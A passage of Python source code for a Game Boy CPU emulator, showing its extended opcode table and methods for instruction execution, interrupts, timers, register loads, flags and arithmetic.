0xd7: lambda: self.restart(0x10),
0xdf: lambda: self.restart(0x18),
0xe7: lambda: self.restart(0x20),
0xef: lambda: self.restart(0x28),
0xf7: lambda: self.restart(0x30),
0xff: lambda: self.restart(0x38),
0xfb: lambda: self.enable_interrupts()
}
self.ext_opcodes = {
0x3f: lambda: self.srl_n(self.A, False),
0x38: lambda: self.srl_n(self.B, False),
0x39: lambda: self.srl_n(self.C, False),
0x3a: lambda: self.srl_n(self.D, False),
0x3b: lambda: self.srl_n(self.E, False),
0x3c: lambda: self.srl_n(self.H, False),
0x3d: lambda: self.srl_n(self.L, False),
0x3e: lambda: self.srl_n(self.HL, False),
0x2f: lambda: self.srl_n(self.A, True),
0x28: lambda: self.srl_n(self.B, True),
0x29: lambda: self.srl_n(self.C, True),
0x2a: lambda: self.srl_n(self.D, True),
0x2b: lambda: self.srl_n(self.E, True),
0x2c: lambda: self.srl_n(self.H, True),
0x2d: lambda: self.srl_n(self.L, True),
0x2e: lambda: self.srl_n(self.HL, True),
0x1f: lambda: self.rr_n(self.A),
0x18: lambda: self.rr_n(self.B),
0x19: lambda: self.rr_n(self.C),
0x1a: lambda: self.rr_n(self.D),
0x1b: lambda: self.rr_n(self.E),
0x1c: lambda: self.rr_n(self.H),
0x1d: lambda: self.rr_n(self.L),
0x1e: lambda: self.rr_n(self.HL),
0x37: lambda: self.swap(self.A),
0x30: lambda: self.swap(self.B),
0x31: lambda: self.swap(self.C),
0x32: lambda: self.swap(self.D),
0x33: lambda: self.swap(self.E),
0x34: lambda: self.swap(self.H),
0x35: lambda: self.swap(self.L),
0x36: lambda: self.swap(self.HL),
0x27: lambda: self.sla_n(self.A),
0x20: lambda: self.sla_n(self.B),
0x21: lambda: self.sla_n(self.C),
0x22: lambda: self.sla_n(self.D),
0x23: lambda: self.sla_n(self.E),
0x24: lambda: self.sla_n(self.H),
0x25: lambda: self.sla_n(self.L),
0x26: lambda: self.sla_n(self.HL),
0x07: lambda: self.rotate_n_lc(self.A),
0x00: lambda: self.rotate_n_lc(self.B),
0x01: lambda: self.rotate_n_lc(self.C),
0x02: lambda: self.rotate_n_lc(self.D),
0x03: lambda: self.rotate_n_lc(self.E),
0x04: lambda: self.rotate_n_lc(self.H),
0x05: lambda: self.rotate_n_lc(self.L),
0x06: lambda: self.rotate_n_lc(self.HL),
0x17: lambda: self.rotate_l_n(self.A),
0x10: lambda: self.rotate_l_n(self.B),
0x11: lambda: self.rotate_l_n(self.C),
0x12: lambda: self.rotate_l_n(self.D),
0x13: lambda: self.rotate_l_n(self.E),
0x14: lambda: self.rotate_l_n(self.H),
0x15: lambda: self.rotate_l_n(self.L),
0x16: lambda: self.rotate_l_n(self.HL),
0x0f: lambda: self.rrc_n(self.A),
0x08: lambda: self.rrc_n(self.B),
0x09: lambda: self.rrc_n(self.C),
0x0a: lambda: self.rrc_n(self.D),
0x0b: lambda: self.rrc_n(self.E),
0x0c: lambda: self.rrc_n(self.H),
0x0d: lambda: self.rrc_n(self.L),
0x0e: lambda: self.rrc_n(self.HL),
0x47: lambda: self.bit_br(0, self.A),
0x40: lambda: self.bit_br(0, self.B),
0x41: lambda: self.bit_br(0, self.C),
0x42: lambda: self.bit_br(0, self.D),
0x43: lambda: self.bit_br(0, self.E),
0x44: lambda: self.bit_br(0, self.H),
0x45: lambda: self.bit_br(0, self.L),
0x46: lambda: self.bit_br(0, self.HL),
0x4f: lambda: self.bit_br(1, self.A),
0x48: lambda: self.bit_br(1, self.B),
0x49: lambda: self.bit_br(1, self.C),
0x4a: lambda: self.bit_br(1, self.D),
0x4b: lambda: self.bit_br(1, self.E),
0x4c: lambda: self.bit_br(1, self.H),
0x4d: lambda: self.bit_br(1, self.L),
0x4e: lambda: self.bit_br(1, self.HL),
0x57: lambda: self.bit_br(2, self.A),
0x50: lambda: self.bit_br(2, self.B),
0x51: lambda: self.bit_br(2, self.C),
0x52: lambda: self.bit_br(2, self.D),
0x53: lambda: self.bit_br(2, self.E),
0x54: lambda: self.bit_br(2, self.H),
0x55: lambda: self.bit_br(2, self.L),
0x56: lambda: self.bit_br(2, self.HL),
0x5f: lambda: self.bit_br(3, self.A),
0x58: lambda: self.bit_br(3, self.B),
0x59: lambda: self.bit_br(3, self.C),
0x5a: lambda: self.bit_br(3, self.D),
0x5b: lambda: self.bit_br(3, self.E),
0x5c: lambda: self.bit_br(3, self.H),
0x5d: lambda: self.bit_br(3, self.L),
0x5e: lambda: self.bit_br(3, self.HL),
0x67: lambda: self.bit_br(4, self.A),
0x60: lambda: self.bit_br(4, self.B),
0x61: lambda: self.bit_br(4, self.C),
0x62: lambda: self.bit_br(4, self.D),
0x63: lambda: self.bit_br(4, self.E),
0x64: lambda: self.bit_br(4, self.H),
0x65: lambda: self.bit_br(4, self.L),
0x66: lambda: self.bit_br(4, self.HL),
0x6f: lambda: self.bit_br(5, self.A),
0x68: lambda: self.bit_br(5, self.B),
0x69: lambda: self.bit_br(5, self.C),
0x6a: lambda: self.bit_br(5, self.D),
0x6b: lambda: self.bit_br(5, self.E),
0x6c: lambda: self.bit_br(5, self.H),
0x6d: lambda: self.bit_br(5, self.L),
0x6e: lambda: self.bit_br(5, self.HL),
0x77: lambda: self.bit_br(6, self.A),
0x70: lambda: self.bit_br(6, self.B),
0x71: lambda: self.bit_br(6, self.C),
0x72: lambda: self.bit_br(6, self.D),
0x73: lambda: self.bit_br(6, self.E),
0x74: lambda: self.bit_br(6, self.H),
0x75: lambda: self.bit_br(6, self.L),
0x76: lambda: self.bit_br(6, self.HL),
0x7f: lambda: self.bit_br(7, self.A),
0x78: lambda: self.bit_br(7, self.B),
0x79: lambda: self.bit_br(7, self.C),
0x7a: lambda: self.bit_br(7, self.D),
0x7b: lambda: self.bit_br(7, self.E),
0x7c: lambda: self.bit_br(7, self.H),
0x7d: lambda: self.bit_br(7, self.L),
0x7e: lambda: self.bit_br(7, self.HL),
0xc7: lambda: self.set_b_r(self.A, 0, 1),
0xc0: lambda: self.set_b_r(self.B, 0, 1),
0xc1: lambda: self.set_b_r(self.C, 0, 1),
0xc2: lambda: self.set_b_r(self.D, 0, 1),
0xc3: lambda: self.set_b_r(self.E, 0, 1),
0xc4: lambda: self.set_b_r(self.H, 0, 1),
0xc5: lambda: self.set_b_r(self.L, 0, 1),
0xc6: lambda: self.set_b_r(self.HL, 0, 1),
0xcf: lambda: self.set_b_r(self.A, 1, 1),
0xc8: lambda: self.set_b_r(self.B, 1, 1),
0xc9: lambda: self.set_b_r(self.C, 1, 1),
0xca: lambda: self.set_b_r(self.D, 1, 1),
0xcb: lambda: self.set_b_r(self.E, 1, 1),
0xcc: lambda: self.set_b_r(self.H, 1, 1),
0xcd: lambda: self.set_b_r(self.L, 1, 1),
0xce: lambda: self.set_b_r(self.HL, 1, 1),
0xd7: lambda: self.set_b_r(self.A, 2, 1),
0xd0: lambda: self.set_b_r(self.B, 2, 1),
0xd1: lambda: self.set_b_r(self.C, 2, 1),
0xd2: lambda: self.set_b_r(self.D, 2, 1),
0xd3: lambda: self.set_b_r(self.E, 2, 1),
0xd4: lambda: self.set_b_r(self.H, 2, 1),
0xd5: lambda: self.set_b_r(self.L, 2, 1),
0xd6: lambda: self.set_b_r(self.HL, 2, 1),
0xdf: lambda: self.set_b_r(self.A, 3, 1),
0xd8: lambda: self.set_b_r(self.B, 3, 1),
0xd9: lambda: self.set_b_r(self.C, 3, 1),
0xda: lambda: self.set_b_r(self.D, 3, 1),
0xdb: lambda: self.set_b_r(self.E, 3, 1),
0xdc: lambda: self.set_b_r(self.H, 3, 1),
0xdd: lambda: self.set_b_r(self.L, 3, 1),
0xde: lambda: self.set_b_r(self.HL, 3, 1),
0xe7: lambda: self.set_b_r(self.A, 4, 1),
0xe0: lambda: self.set_b_r(self.B, 4, 1),
0xe1: lambda: self.set_b_r(self.C, 4, 1),
0xe2: lambda: self.set_b_r(self.D, 4, 1),
0xe3: lambda: self.set_b_r(self.E, 4, 1),
0xe4: lambda: self.set_b_r(self.H, 4, 1),
0xe5: lambda: self.set_b_r(self.L, 4, 1),
0xe6: lambda: self.set_b_r(self.HL, 4, 1),
0xef: lambda: self.set_b_r(self.A, 5, 1),
0xe8: lambda: self.set_b_r(self.B, 5, 1),
0xe9: lambda: self.set_b_r(self.C, 5, 1),
0xea: lambda: self.set_b_r(self.D, 5, 1),
0xeb: lambda: self.set_b_r(self.E, 5, 1),
0xec: lambda: self.set_b_r(self.H, 5, 1),
0xed: lambda: self.set_b_r(self.L, 5, 1),
0xee: lambda: self.set_b_r(self.HL, 5, 1),
0xf7: lambda: self.set_b_r(self.A, 6, 1),
0xf0: lambda: self.set_b_r(self.B, 6, 1),
0xf1: lambda: self.set_b_r(self.C, 6, 1),
0xf2: lambda: self.set_b_r(self.D, 6, 1),
0xf3: lambda: self.set_b_r(self.E, 6, 1),
0xf4: lambda: self.set_b_r(self.H, 6, 1),
0xf5: lambda: self.set_b_r(self.L, 6, 1),
0xf6: lambda: self.set_b_r(self.HL, 6, 1),
0xff: lambda: self.set_b_r(self.A, 7, 1),
0xf8: lambda: self.set_b_r(self.B, 7, 1),
0xf9: lambda: self.set_b_r(self.C, 7, 1),
0xfa: lambda: self.set_b_r(self.D, 7, 1),
0xfb: lambda: self.set_b_r(self.E, 7, 1),
0xfc: lambda: self.set_b_r(self.H, 7, 1),
0xfd: lambda: self.set_b_r(self.L, 7, 1),
0xfe: lambda: self.set_b_r(self.HL, 7, 1),
0x87: lambda: self.set_b_r(self.A, 0, 0),
0x80: lambda: self.set_b_r(self.B, 0, 0),
0x81: lambda: self.set_b_r(self.C, 0, 0),
0x82: lambda: self.set_b_r(self.D, 0, 0),
0x83: lambda: self.set_b_r(self.E, 0, 0),
0x84: lambda: self.set_b_r(self.H, 0, 0),
0x85: lambda: self.set_b_r(self.L, 0, 0),
0x86: lambda: self.set_b_r(self.HL, 0, 0),
0x8f: lambda: self.set_b_r(self.A, 1, 0),
0x88: lambda: self.set_b_r(self.B, 1, 0),
0x89: lambda: self.set_b_r(self.C, 1, 0),
0x8a: lambda: self.set_b_r(self.D, 1, 0),
0x8b: lambda: self.set_b_r(self.E, 1, 0),
0x8c: lambda: self.set_b_r(self.H, 1, 0),
0x8d: lambda: self.set_b_r(self.L, 1, 0),
0x8e: lambda: self.set_b_r(self.HL, 1, 0),
0x97: lambda: self.set_b_r(self.A, 2, 0),
0x90: lambda: self.set_b_r(self.B, 2, 0),
0x91: lambda: self.set_b_r(self.C, 2, 0),
0x92: lambda: self.set_b_r(self.D, 2, 0),
0x93: lambda: self.set_b_r(self.E, 2, 0),
0x94: lambda: self.set_b_r(self.H, 2, 0),
0x95: lambda: self.set_b_r(self.L, 2, 0),
0x96: lambda: self.set_b_r(self.HL, 2, 0),
0x9f: lambda: self.set_b_r(self.A, 3, 0),
0x98: lambda: self.set_b_r(self.B, 3, 0),
0x99: lambda: self.set_b_r(self.C, 3, 0),
0x9a: lambda: self.set_b_r(self.D, 3, 0),
0x9b: lambda: self.set_b_r(self.E, 3, 0),
0x9c: lambda: self.set_b_r(self.H, 3, 0),
0x9d: lambda: self.set_b_r(self.L, 3, 0),
0x9e: lambda: self.set_b_r(self.HL, 3, 0),
0xa7: lambda: self.set_b_r(self.A, 4, 0),
0xa0: lambda: self.set_b_r(self.B, 4, 0),
0xa1: lambda: self.set_b_r(self.C, 4, 0),
0xa2: lambda: self.set_b_r(self.D, 4, 0),
0xa3: lambda: self.set_b_r(self.E, 4, 0),
0xa4: lambda: self.set_b_r(self.H, 4, 0),
0xa5: lambda: self.set_b_r(self.L, 4, 0),
0xa6: lambda: self.set_b_r(self.HL, 4, 0),
0xaf: lambda: self.set_b_r(self.A, 5, 0),
0xa8: lambda: self.set_b_r(self.B, 5, 0),
0xa9: lambda: self.set_b_r(self.C, 5, 0),
0xaa: lambda: self.set_b_r(self.D, 5, 0),
0xab: lambda: self.set_b_r(self.E, 5, 0),
0xac: lambda: self.set_b_r(self.H, 5, 0),
0xad: lambda: self.set_b_r(self.L, 5, 0),
0xae: lambda: self.set_b_r(self.HL, 5, 0),
0xb7: lambda: self.set_b_r(self.A, 6, 0),
0xb0: lambda: self.set_b_r(self.B, 6, 0),
0xb1: lambda: self.set_b_r(self.C, 6, 0),
0xb2: lambda: self.set_b_r(self.D, 6, 0),
0xb3: lambda: self.set_b_r(self.E, 6, 0),
0xb4: lambda: self.set_b_r(self.H, 6, 0),
0xb5: lambda: self.set_b_r(self.L, 6, 0),
0xb6: lambda: self.set_b_r(self.HL, 6, 0),
0xbf: lambda: self.set_b_r(self.A, 7, 0),
0xb8: lambda: self.set_b_r(self.B, 7, 0),
0xb9: lambda: self.set_b_r(self.C, 7, 0),
0xba: lambda: self.set_b_r(self.D, 7, 0),
0xbb: lambda: self.set_b_r(self.E, 7, 0),
0xbc: lambda: self.set_b_r(self.H, 7, 0),
0xbd: lambda: self.set_b_r(self.L, 7, 0),
0xbe: lambda: self.set_b_r(self.HL, 7, 0)
}
def save_state(self, name, session):
"""
Save the cpu state into the SQLAlchemy session session.
...
Parameters
----------
name : string
name to associate with the save
session : A SQLAlchemy Session object
session to save the state in
Returns
-------
Human readable error message, or None on success
"""
pickledregisters = pickle.dumps(self.reg)
cpu_state = CpuState(savename=name, stack_ptr=self.sp,
program_ctr=self.pc,
gbregisters=pickledregisters)
session.add(cpu_state)
session.commit()
def init_boot(self):
"""
Initializes the cpu for running the bootstrap "bios".
"""
self.pc = 0
self.sp = 0
def execute_boot_opcode(self, num=1):
"""
Executes an opcode of the booting sequence, takes
????? instructions to complete.
Reads instructions with mem.read_bios() instead
of from normal memory.
Returns
-------
int
number of clock cycles taken
"""
if self.pc >= 0x100:
log.info("BIOS COMPLETE!")
self.dump_registers()
quit()
opcode = self.mem.read_bios(self.pc)
self.pc += 1
try:
#log.info("executing: " + hex(opcode) + " @ " + hex(self.pc - 1))
cycles = self.opcodes[opcode]()
except KeyError:
log.critical('INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
cycles = 0
return cycles
def execute_opcode(self, num=1):
"""
Executes num number of opcode instructions.
...
Parameters
----------
num : int
number of opcode instructions to execute
Returns
-------
int
number of clock cycles taken to execute
"""
opcode = self.mem.read(self.pc)
self.pc += 1
try:
cycles = self.opcodes[opcode]()
except KeyError:
log.critical('INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
quit()
cycles += self.check_interrupts()
self.update_timers(cycles)
return cycles
def extended_opcode(self):
"""
Extended opcodes.
Returns
-------
int
number of cycles taken
"""
opcode = self.mem.read(self.pc)
self.pc += 1
try:
cycles = self.ext_opcodes[opcode]()
except KeyError:
log.critical('EXTENDED INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
quit()
cycles = 0
return cycles
def check_interrupts(self):
"""
Checks to see if any interrupts need to be serviced
"""
if not self.interrupt_enable:
return 0
ie = self.mem.read(0xffff)
ir = self.mem.read(0xff0f)
for bit in range(5):
if self.is_set(ie, bit) and self.is_set(ir, bit):
self.push_pc()
self.pc = 0x40 + (bit << 3)
ir &= ~(1 << bit)
self.mem.write(ir & 0xff, 0xff0f)
self.interrupt_enable = False
return 20
return 0
def update_timers(self, cycles):
"""
Updates the timers, requests interrupts if needed.
"""
self.div_clock += cycles
if self.div_clock >= 256:
self.div_clock = self.div_clock % 256
self.mem.inc_div()
tima_ctrl = self.mem.read(0xff07)
if tima_ctrl & 0x4 == 0:
self.tima_clock = 0
else:
self.tima_clock += cycles
rate = self.get_tima_rate(tima_ctrl)
if self.tima_clock >= rate:
self.tima_clock = self.tima_clock % rate
self.mem.inc_tima()
def get_tima_rate(self, ctrl):
"""
Gets the increment rate from tima ctrl.
"""
speed = ctrl & 0x3
if speed == 0:
return 1024
elif speed == 1:
return 16
elif speed == 2:
return 64
else:
return 256
def request_interrupt(self, num):
"""
Request an interrupt to be serviced by cpu
num == 0 - VBlank
1 - LCD STAT
2 - Timer
3 - Serial
4 - Joypad
"""
ir = self.mem.read(0xff0f)
ir |= 1 << num
self.mem.write(ir, 0xff0f)
def NOP(self):
""" No operation """
return 4
def ld_byte_n(self, reg_index):
"""
Load a byte from memory into register.
Byte is located at pc.
...
Parameters
----------
reg_index : int
index of reg to load
"""
self.reg[reg_index] = self.mem.read(self.pc)
self.pc += 1
return 8
def ld_r1_r2(self, r1, r2):
"""
Put value r2 into r1.
r1,r2 = A,B,C,D,E,H,L,(HL)
...
Parameters
----------
r1 : int
index of r1
r2 : int
index of r2
"""
if r2 != self.HL and r1 != self.HL:
self.reg[r1] = self.reg[r2]
return 4
elif r2 == self.HL:
self.reg[r1] = self.mem.read(self.get_reg(self.H, self.L))
return 8
elif r2 == self.N:
self.mem.write(self.mem.read(self.pc), self.get_reg(self.H, self.L))
self.pc += 1
return 12
else:
self.mem.write(self.reg[r2], self.get_reg(self.H, self.L))
return 8
def load_a(self, src):
"""
Put value src into A.
src = (BC/DE/nn), n
...
Parameters
----------
src
which src to load into a
"""
if src == self.BC:
self.reg[self.A] = self.mem.read(self.get_reg(self.B, self.C))
return 8
elif src == self.DE:
self.reg[self.A] = self.mem.read(self.get_reg(self.D, self.E))
return 8
elif src == self.NN:
self.reg[self.A] = self.mem.read(self.mem.read_word(self.pc))
self.pc += 2
return 16
else: #self.N
self.reg[self.A] = self.mem.read(self.pc)
self.pc += 1
return 8
def write_a(self, dest):
"""
Put value A into dest.
...
Parameters
----------
dest : A-L, (BC/DE/HL/nn)
place to store A
"""
if dest == self.BC:
self.mem.write(self.reg[self.A], self.get_reg(self.B, self.C))
return 8
elif dest == self.DE:
self.mem.write(self.reg[self.A], self.get_reg(self.D, self.E))
return 8
elif dest == self.HL:
self.mem.write(self.reg[self.A], self.get_reg(self.H, self.L))
return 8
elif dest == self.NN:
self.mem.write(self.reg[self.A], self.mem.read_word(self.pc))
self.pc += 2
return 16
else:
self.reg[dest] = self.reg[self.A]
return 4
def load_a_c(self, store=False):
"""
Load A, (C) - put value at 0xff00 + regC into A, or
Put A into address 0xff00 + regC
...
Parameters
----------
store : bool
False - Put value 0xff00 + regC into A
True - store A at 0xff00 + regC
Returns
-------
int
num of cycles
"""
if store:
self.mem.write(self.reg[self.A], self.reg[self.C] + 0xff00)
else:
self.reg[self.A] = self.mem.read(self.reg[self.C] + 0xff00)
return 8
def load_a_hl(self, dec, load):
"""
Store/load A in (HL), or (HL) in A, increment/decrement HL.
...
Parameters
----------
dec : bool
Decrement register HL if True, increments if False
load : bool
Load value at (HL) into A if true
Store A at (HL) if false
Returns
-------
int
num of cycles
"""
if load:
self.reg[self.A] = self.mem.read(self.get_reg(self.H, self.L))
else:
self.mem.write(self.reg[self.A], self.get_reg(self.H, self.L))
HL_val = self.get_reg(self.H, self.L)
HL_val += -1 if dec else 1
self.set_reg(self.H, self.L, HL_val)
return 8
def a_n(self, store):
"""
Store/load A in memory address 0xff00 + n
Parameters
----------
store : bool
if true writes, if false loads
Returns
-------
int
num of cycles
"""
offset = self.mem.read(self.pc)
self.pc += 1
if store:
self.mem.write(self.reg[self.A], offset + 0xff00)
else:
#print('address: ' + hex(offset+ 0xff00) + ' ' + hex(self.mem.read(offset + 0xff00)))
self.reg[self.A] = self.mem.read(offset + 0xff00)
return 12
def ld_nn(self, dest, set_sp=False):
"""
Put value nn into dest.
Dest = BC/DE/HL/SP
Parameters
----------
dest : int
destination register pair (defined in class constants)
if not self.BC/DE/HL defaults to setting stack pointer
set_sp : bool
if True, loads value into stack pointer
if False, doesnt
Returns
-------
int
num of cycles
"""
word = self.mem.read_word(self.pc)
self.pc += 2
if set_sp:
self.sp = word
return 12
elif dest == self.BC:
r1 = self.B
r2 = self.C
elif dest == self.DE:
r1 = self.D
r2 = self.E
elif dest == self.HL:
r1 = self.H
r2 = self.L
self.set_reg(r1, r2, word)
return 12
def ld_sp_hl(self):
"""
Put HL into sp.
Returns
-------
int
number of cycles
"""
self.sp = self.get_reg(self.H, self.L)
return 8
def ldhl_sp(self):
"""
Put sp + n effective address into HL.
n = one byte signed value
Flags:
Z/N - Reset
H/C - Set/Reset according to operation
"""
#interpret as signed byte
n = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.set_reg(self.H, self.L, self.sp + n)
self.reset_flags()
if (self.sp & 0xf) + (n & 0xf) > 0xf:
self.set_flag(self.flags.H)
if (self.sp & 0xff) + (n & 0xff) > 0xff:
self.set_flag(self.flags.C)
return 12
def ld_nn_sp(self):
"""
Put sp at address nn (two byte immediate address).
Returns
-------
int
number of clock cycles
"""
address = self.mem.read_word(self.pc)
self.pc += 2
self.mem.write(self.sp & 0xff, address)
self.mem.write((self.sp & 0xff00) >> 8, address + 1)
return 20
def push_nn(self, r1, r2):
"""
Push register pair r1r2 onto stack.
Decrement sp twice.
Parameters
----------
r1, r2
register pair r1r2
"""
self.sp -= 1
self.mem.write(self.reg[r1], self.sp)
self.sp -= 1
self.mem.write(self.reg[r2], self.sp)
return 16
def pop_nn(self, r1, r2):
"""
Pop two bytes off stack into register pair r1r2.
Increment sp twice.
Parameters
----------
r1
reg1
r2
reg2
"""
self.reg[r2] = self.mem.read(self.sp)
if r2 == self.F:
self.reg[r2] &= 0xf0
self.sp += 1
self.reg[r1] = self.mem.read(self.sp)
self.sp += 1
return 12
def set_reg(self, r1, r2, word):
"""
set register pair r1r2 to 16 bit word.
Parameters
----------
r1,r2 : ints
indexes of r1 r2 registers to set
r1 = H, r2 = L sets pair HL
"""
self.reg[r1] = (word & 0xff00) >> 8
self.reg[r2] = word & 0xff
def get_reg(self, r1, r2):
"""
Access register r1r2 - combination of r1 and r1 registers.
For example get_reg(H,L) accesses register HL
...
Returns
-------
int
value of HL register
"""
return ((self.reg[r1] << 8) | self.reg[r2])
def set_flag(self, flag):
"""
Sets Flag flag in the F register.
Parameters
----------
flag : Flag enum
which flag to set
"""
if flag == self.flags.Z:
self.reg[self.F] |= 0x80
elif flag == self.flags.H:
self.reg[self.F] |= 0x20
elif flag == self.flags.C:
self.reg[self.F] |= 0x10
elif flag == self.flags.N:
self.reg[self.F] |= 0x40
def reset_flag(self, flag):
"""
Resets Flag flag in the F register.
Parameters
----------
flag : Flag enum
which flag to reset
"""
if flag == self.flags.Z:
self.reg[self.F] &= 0x70
elif flag == self.flags.H:
self.reg[self.F] &= 0xd0
elif flag == self.flags.C:
self.reg[self.F] &= 0xe0
elif flag == self.flags.N:
self.reg[self.F] &= 0xb0
def flag_set(self, flag):
"""
Returns True if flag is set
False if not
Parameters
----------
flag : Flag enum
which flag to check
Returns
-------
bool
True if set, False if not
"""
if flag == self.flags.Z:
return self.reg[self.F] & 0x80 != 0
elif flag == self.flags.H:
return self.reg[self.F] & 0x20 != 0
elif flag == self.flags.C:
return self.reg[self.F] & 0x10 != 0
elif flag == self.flags.N:
return self.reg[self.F] & 0x40 != 0
def add_a_n(self, src, add_carry=False):
"""
Add n to A (and carry if add_carry is true).
Flags:
Z - Set if zero
N - Reset
H - Set if carry from bit 3
C - Set if carry from bit 7
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
clock cycles taken
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
carry_bit = 1 if add_carry and self.flag_set(self.flags.C) else 0
self.reg[self.A] = (a_reg + carry_bit + val) & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) + (val & 0xf) + carry_bit > 0xf:
self.set_flag(self.flags.H)
if a_reg + val + carry_bit > 0xff:
self.set_flag(self.flags.C)
return 8 if src == self.N or src == self.HL else 4
def sub_a_n(self, src, sub_carry=False):
"""
Subtract n from A (n + carry if sub_carry is true)
Flags:
Z - Set if 0
N - Set
H - Set if no borrow from bit 4
C - Set if no borrow
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
number of cylces elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
carry_bit = 1 if sub_carry and self.flag_set(self.flags.C) else 0
self.reg[self.A] = (a_reg - val - carry_bit) & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) < (val & 0xf) + carry_bit:
self.set_flag(self.flags.H)
if a_reg < val + carry_bit:
self.set_flag(self.flags.C)
self.set_flag(self.flags.N)
return 8 if src == self.N or src == self.HL else 4
def and_n(self, src):
"""
Logically AND n with A, result in A
Flags:
Z - Set if result is 0
N/C - Reset
H - Set
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
number of cycles elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
self.reg[self.A] = val & a_reg & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
self.set_flag(self.flags.H)
return 8 if src == self.N or src == self.HL else 4
def or_n(self, src, exclusive_or=False):
"""
Logically OR or XOR n with A, result in A.
Flags:
Z - Set if 0
N/H/C - Reset
Parameters
----------
src
source A-L, (HL), or n
exclusive_or
if True uses exclusive OR not OR
Returns
-------
int
number of cycles elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: # src is index of A-L
val = self.reg[src]
#
# if exclusive_or:
# print("data: " + hex(val))
# print("reg a: " + hex(a_reg))
# print((a_reg ^ val) & 0xff)
self.reg[self.A] = (a_reg ^ val) if exclusive_or else (a_reg | val)
self.reg[self.A] &= 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
return 8 if val == self.HL or val == self.N else 4
def cp_n(self, src):
"""
Compare A with n (A - n subtraction but results arent saved).
Flags:
Z - Set if 0
N - Set
H - Set if no borrow from bit 4
C - Set if no borrow (if A is less than n)
Parameters
----------
src
A-L, (HL), N
Returns
-------
int
number of clock cycles
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: # src is index
val = self.reg[src]
self.reset_flags()
self.set_flag(self.flags.N)
if val == a_reg:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) < (val & 0xf):
self.set_flag(self.flags.H)
if a_reg < val:
self.set_flag(self.flags.C)
return 8 if src == self.N or src == self.HL else 4
def inc_n(self, src):
"""
Increment register n
Flags:
Z - Set if 0
N - Reset
H - Set if carry from bit 3
C - Not affected
Parameters
----------
src
A-L, (HL)
Returns
-------
int
number of cycles
"""
if src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
#log.debug('INC HL: address:' + hex(self.get_reg(self.H, self.L)))
#log.debug('OLD VAL: ' + hex(val))
old_val = val
self.mem.write((val + 1) & 0xff, self.get_reg(self.H, self.L))
val = (val + 1) & 0xff
#log.debug('NEW VAL: ' + hex((val + 1) & 0xff))
else: # src is index
old_val = self.reg[src]
val = (self.reg[src] + 1) & 0xff
self.reg[src] = val
self.reset_flag(self.flags.Z)
if val == 0:
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.N)
self.reset_flag(self.flags.H)
if old_val & 0xf == 0xf:
self.set_flag(self.flags.H)
return 12 if src == self.HL else 4
def dec_n(self, src):
"""
Decrement register n.
Flags:
Z - Set if 0
N - Set
H - Set if no borrow from bit 4
C - Not affected
Parameters
----------
src
A-L, (HL)
Returns
-------
int
number of cycles
"""
if src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
self.mem.write((val - 1) & 0xff, self.get_reg(self.H, self.L))
val = (val - 1) & 0xff
else: # src is index
val = (self.reg[src] - 1) & 0xff
self.reg[src] = val
self.set_flag(self.flags.Z) if val == 0 \
else self.reset_flag(self.flags.Z)
self.set_flag(self.flags.N)
self.set_flag(self.flags.H) if (val + 1) & 0xf0 != 0xf0 & val \
else self.reset_flag(self.flags.H)
return 12 if src == self.HL else 4
def add_hl(self, r1, r2, add_sp=False):
"""
Add n to HL.
Flags:
Z - Not affected
N - Reset
H - Set if carry from bit 11
C - Set if carry from bit 15
Parameters
----------
r1, r2
register index for HL, BC, DE
add_sp : bool
if true addes to sp not register pair
Returns
-------
int
cycles taken
"""
hl = self.get_reg(self.H, self.L)
val = self.sp if add_sp else self.get_reg(r1, r2)
self.set_reg(self.H, self.L, (val + hl) & 0xffff)
self.reset_flag(self.flags.N)
if (val & 0xfff) + (hl & 0xfff) > 0xfff:
self.set_flag(self.flags.H)
else:
self.reset_flag(self.flags.H)
if val + hl > 0xffff:
self.set_flag(self.flags.C)
else:
self.reset_flag(self.flags.C)
return 8
def add_sp_n(self):
"""
Adds an immediate signed byte to sp.
Flags:
Z, N - Reset
H, C - Set/Reset according to operation
NOTE: Specifications vague if this is 8 or
16 bit flag addition behavior
Returns
-------
int
cycles taken
"""
# read as a signed byte
val = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.reset_flags()
if (self.sp & 0xf) + (val & 0xf) > 0xf:
self.set_flag(self.flags.H)
if (self.sp & 0xff) + (val & 0xff) > 0xff:
self.set_flag(self.flags.C)
self.sp += val
self.sp &= 0xffff
return 16
def inc_nn(self, r1, r2, inc_sp=False):
"""
Increment register pair r1r2.
Parameters
----------
r1r2
register pair r1r2
inc_sp : Boolean
if True increments SP not r1r2
Returns
-------
int
clock cycles taken
"""
if inc_sp:
self.sp += 1
self.sp &= 0xffff
else:
val = self.get_reg(r1, r2)
